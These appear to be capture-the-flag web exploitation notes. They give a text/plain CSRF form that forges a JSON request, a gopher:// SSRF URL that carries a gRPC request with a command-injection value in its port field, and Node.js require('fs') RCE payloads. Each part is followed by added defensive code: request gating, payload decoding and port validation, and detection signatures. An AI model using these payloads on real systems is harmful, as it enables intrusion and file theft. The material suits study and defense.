Web tricks
CSRF via JSON when the request Content-Type is not validated on the target
Host an HTML file with the following contents. With enctype="text/plain" the browser sends the single hidden input as name=value, so the "=" lands inside a throwaway key and the body reads as a JSON object:
<html>
<body>
<!-- body sent: {"status": "xxx","foo=":"b"} with Content-Type: text/plain -->
<form action="http://127.0.0.1:80/api/xxx" method="POST" enctype="text/plain">
<input type="hidden" name='{"status": "xxx","foo' value='":"b"}' />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
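The server-side check that closes this trick, added here as an example (it is not code from the notes above). form_text_plain_body reproduces what the browser sends for the hidden input, and accept_json_request is the gate a JSON endpoint should apply before parsing: require Content-Type application/json, compare Origin against a first-party allow list, and honour Sec-Fetch-Site. ALLOWED_ORIGINS and all function names are assumptions for this example.

```python
import json
from typing import Any, Mapping, Tuple

# Hypothetical first-party origin for this example.
ALLOWED_ORIGINS = {"https://app.example"}


def form_text_plain_body(name: str, value: str) -> bytes:
    """Body a browser sends for one hidden input under enctype=text/plain:
    name=value followed by CRLF, with Content-Type: text/plain."""
    return f"{name}={value}\r\n".encode()


def what_the_parser_sees(body: bytes) -> Any:
    """A JSON endpoint that ignores Content-Type just calls the parser;
    the text/plain body above is valid JSON and is accepted."""
    return json.loads(body)


def accept_json_request(headers: Mapping[str, str], body: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Only parse the body when the request is a
    genuine JSON call from an allowed origin."""
    # 1. A cross-site HTML form cannot set application/json, so requiring it
    #    rejects the enctype=text/plain trick outright.
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, f"unexpected content type {ctype!r}"
    # 2. Browsers attach Origin to cross-origin POSTs; compare it to the allow list.
    origin = headers.get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, f"origin {origin!r} not allowed"
    # 3. Sec-Fetch-Site is "cross-site" for a form posted from another site.
    if headers.get("Sec-Fetch-Site", "same-origin") == "cross-site":
        return False, "cross-site fetch"
    try:
        json.loads(body)
    except ValueError:
        return False, "body is not JSON"
    return True, "ok"


if __name__ == "__main__":
    # Constructed request matching the form above.
    body = form_text_plain_body('{"status": "xxx","foo', '":"b"}')
    print(body, what_the_parser_sees(body))
    print(accept_json_request({"Content-Type": "text/plain", "Origin": "http://attacker.example"}, body))
```

The Content-Type check alone defeats the form-based variant; the Origin and Sec-Fetch-Site checks cover clients that can set arbitrary headers but still run inside a browser's same-origin rules.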
URL injection to gRPC via gopher://
Start Wireshark on the loopback interface and capture the traffic generated by this request:
grpcurl -plaintext -proto live_data.proto \
-d '{"ip": "127.0.0.1", "port": "1337; cp /flag* /app/eldoria_api/public/flag.txt"}' \
localhost:50051 live.LiveDataService/CheckHealth
Copy the raw HTTP/2 bytes of the gRPC request (preface, SETTINGS, HEADERS and DATA frames) from Wireshark as hex and use this script to build a gopher:// URL that carries them:
def grpc_packet():
    # sniffed using tcpdump https://bkubiak.github.io/grpc-raw-requests/
    # grpcurl -plaintext -proto live_data.proto -d '{"ip": "127.0.0.1", "port": "1337; cp /flag* /app/eldoria_api/public/flag.txt"}' localhost:50051 live.LiveDataService/CheckHealth
    # HTTP/2 connection preface: "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
    magic = "505249202a20485454502f322e300d0a0d0a534d0d0a0d0a"
    # empty SETTINGS frame
    settings = "000000040100000000"
    # HEADERS frame on stream 1 (HPACK-encoded request headers)
    headers = "00007c010400000001838645986283772af9cddcb7c691ee2d9dcc42b17a7293ae328e84cf418ba0e41d139d09b8d800d87f5f8b1d75d0620d263d4c4d65647aa59acac96d9431217bad1da6a2453faa8ea772d8831ea51054ff6a4d65645a63b015db75707f40027465864d833505b11f408e9acac8b0c842d6958b510f21aa9b839bd9ab"
    # DATA frame on stream 1 with the length-prefixed protobuf CheckHealth request
    data = "000042000100000001000000003d0a093132372e302e302e311230313333373b206370202f666c61672a202f6170702f656c646f7269615f6170692f7075626c69632f666c61672e747874"
    packet = magic + settings + headers + data
    # percent-encode every byte so the gopher client writes it to the socket verbatim
    encoded_packet = ""
    for i in range(int(len(packet) / 2)):
        encoded_packet += "%" + packet[2*i:2*(i+1)]
    return f"gopher://127.0.0.1:50051/_{encoded_packet}"

print(grpc_packet())
The output should be a URL like this:
gopher://127.0.0.1:50051/_%50%52%49%20%2a%20%48%54%54%50%2f%32%2e%30%0d%0a%0d%0a%53%4d%0d%0a%0d%0a%00%00%00%04%01%00%00%00%00%00%00%7c%01%04%00%00%00%01%83%86%45%98%62%83%77%2a%f9%cd%dc%b7%c6%91%ee%2d%9d%cc%42%b1%7a%72%93%ae%32%8e%84%cf%41%8b%a0%e4%1d%13%9d%09%b8%d8%00%d8%7f%5f%8b%1d%75%d0%62%0d%26%3d%4c%4d%65%64%7a%a5%9a%ca%c9%6d%94%31%21%7b%ad%1d%a6%a2%45%3f%aa%8e%a7%72%d8%83%1e%a5%10%54%ff%6a%4d%65%64%5a%63%b0%15%db%75%70%7f%40%02%74%65%86%4d%83%35%05%b1%1f%40%8e%9a%ca%c8%b0%c8%42%d6%95%8b%51%0f%21%aa%9b%83%9b%d9%ab%00%00%42%00%01%00%00%00%01%00%00%00%00%3d%0a%09%31%32%37%2e%30%2e%30%2e%31%12%30%31%33%33%37%3b%20%63%70%20%2f%66%6c%61%67%2a%20%2f%61%70%70%2f%65%6c%64%6f%72%69%61%5f%61%70%69%2f%70%75%62%6c%69%63%2f%66%6c%61%67%2e%74%78%74
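A decoder for the URL above, added here as an example (not code from the notes or from the tool they cite). It percent-decodes the gopher selector, walks the HTTP/2 frames, pulls the string fields out of the gRPC DATA frame so that a log review of an SSRF attempt shows exactly what value reaches the service's port field, and then applies the input validation the receiving service should perform before using a client-supplied port. The hex constants are the same ones the script above uses; the function names, the FRAME_TYPES table and the validate_port rule are my own assumptions.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_to_bytes

H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
FRAME_TYPES = {0: "DATA", 1: "HEADERS", 4: "SETTINGS"}

# Hex copied from the script above so the example runs offline.
MAGIC = "505249202a20485454502f322e300d0a0d0a534d0d0a0d0a"
SETTINGS = "000000040100000000"
HEADERS = "00007c010400000001838645986283772af9cddcb7c691ee2d9dcc42b17a7293ae328e84cf418ba0e41d139d09b8d800d87f5f8b1d75d0620d263d4c4d65647aa59acac96d9431217bad1da6a2453faa8ea772d8831ea51054ff6a4d65645a63b015db75707f40027465864d833505b11f408e9acac8b0c842d6958b510f21aa9b839bd9ab"
DATA = "000042000100000001000000003d0a093132372e302e302e311230313333373b206370202f666c61672a202f6170702f656c646f7269615f6170692f7075626c69632f666c61672e747874"
RAW_HEX = MAGIC + SETTINGS + HEADERS + DATA
SAMPLE_URL = "gopher://127.0.0.1:50051/_" + "".join("%" + RAW_HEX[i:i + 2] for i in range(0, len(RAW_HEX), 2))


def gopher_payload(url: str) -> bytes:
    """Bytes a gopher client writes to the socket: everything after the '_' selector."""
    selector = url.split("/", 3)[3]
    if not selector.startswith("_"):
        raise ValueError("not a raw gopher selector")
    return unquote_to_bytes(selector[1:])


def split_h2_frames(raw: bytes) -> List[Tuple[str, int, int, bytes]]:
    """Return (type, flags, stream_id, payload) for each frame after the preface."""
    if not raw.startswith(H2_PREFACE):
        raise ValueError("missing HTTP/2 connection preface")
    pos, frames = len(H2_PREFACE), []
    while pos < len(raw):
        length = int.from_bytes(raw[pos:pos + 3], "big")        # 24-bit length
        ftype, flags = raw[pos + 3], raw[pos + 4]
        stream_id = int.from_bytes(raw[pos + 5:pos + 9], "big") & 0x7FFFFFFF
        payload = raw[pos + 9:pos + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame")
        frames.append((FRAME_TYPES.get(ftype, str(ftype)), flags, stream_id, payload))
        pos += 9 + length
    return frames


def decode_grpc_strings(data_payload: bytes) -> Dict[int, str]:
    """Decode the length-delimited (wire type 2) fields of the protobuf message
    inside gRPC's 5-byte length-prefixed framing. Single-byte tags are assumed,
    which covers field numbers below 16 and is all CheckHealth uses."""
    compressed, msg_len = data_payload[0], int.from_bytes(data_payload[1:5], "big")
    if compressed:
        raise ValueError("compressed messages not handled")
    msg, fields, pos = data_payload[5:5 + msg_len], {}, 0
    while pos < len(msg):
        tag, pos = msg[pos], pos + 1
        field_no, wire_type = tag >> 3, tag & 7
        if wire_type != 2:
            raise ValueError(f"unsupported wire type {wire_type}")
        length, shift = 0, 0                                      # varint length
        while True:
            b, pos = msg[pos], pos + 1
            length |= (b & 0x7F) << shift
            if not b & 0x80:
                break
            shift += 7
        fields[field_no] = msg[pos:pos + length].decode("utf-8", "replace")
        pos += length
    return fields


PORT_RE = re.compile(r"^\d{1,5}$")


def validate_port(value: str) -> int:
    """Mitigation: parse the client-supplied port as a number and never pass
    the raw string to a shell."""
    if not PORT_RE.match(value):
        raise ValueError(f"port is not numeric: {value!r}")
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port


def analyse(url: str) -> Dict[str, object]:
    """Frame list, decoded request fields and the validation verdict for one URL."""
    frames = split_h2_frames(gopher_payload(url))
    data = next(p for t, _, _, p in frames if t == "DATA")
    fields = decode_grpc_strings(data)
    try:
        validate_port(fields.get(2, ""))
        verdict = "port ok"
    except ValueError as e:
        verdict = f"rejected: {e}"
    return {"frames": [t for t, *_ in frames], "ip": fields.get(1), "port": fields.get(2), "verdict": verdict}


if __name__ == "__main__":
    print(analyse(SAMPLE_URL))
```

Two things the decoded output makes obvious: the gopher:// scheme should never be reachable from a URL-fetching feature (allow-list http/https and block loopback destinations), and the gRPC service must treat "port" as an integer, which validate_port enforces.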
RCE via Node.js
Use require directly:
require('fs').readFileSync('flag.txt', 'utf8')
If that fails (require is not in scope), reach it through the process object instead:
global.process.mainModule.require('fs').readFileSync('flag.txt', 'utf8')
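A detection rule for the two payload shapes above, added as an example and not part of the original notes: the kind of check a WAF rule or a log-review script applies to user-supplied template or expression strings. The signature names, the function names and the sample inputs are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Patterns taken from the two payloads shown above.
SIGNATURES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("require-fs", re.compile(r"require\s*\(\s*['\"]fs['\"]\s*\)")),
    ("mainModule-require", re.compile(r"process\.mainModule\.require")),
    ("file-read", re.compile(r"readFileSync\s*\(")),
]


def flag_payload(text: str) -> List[str]:
    """Names of the signatures that match one submitted string, in table order."""
    return [name for name, rx in SIGNATURES if rx.search(text)]


def scan_requests(bodies: List[str]) -> Dict[str, List[str]]:
    """Map each request body to its matching signatures (empty list = clean)."""
    return {body: flag_payload(body) for body in bodies}


# Constructed sample request bodies: the two payloads above plus a benign template.
SAMPLE_BODIES = [
    "require('fs').readFileSync('flag.txt', 'utf8')",
    "global.process.mainModule.require('fs').readFileSync('flag.txt', 'utf8')",
    "{{ user.name }}",
]

if __name__ == "__main__":
    for body, hits in scan_requests(SAMPLE_BODIES).items():
        print(f"{'ALERT' if hits else 'ok   '} {hits} {body}")
```

Signature matching is a detection aid, not the fix: the underlying defect is evaluating user input as JavaScript, and the second payload on this page already shows how a naive check on the bare word require is bypassed.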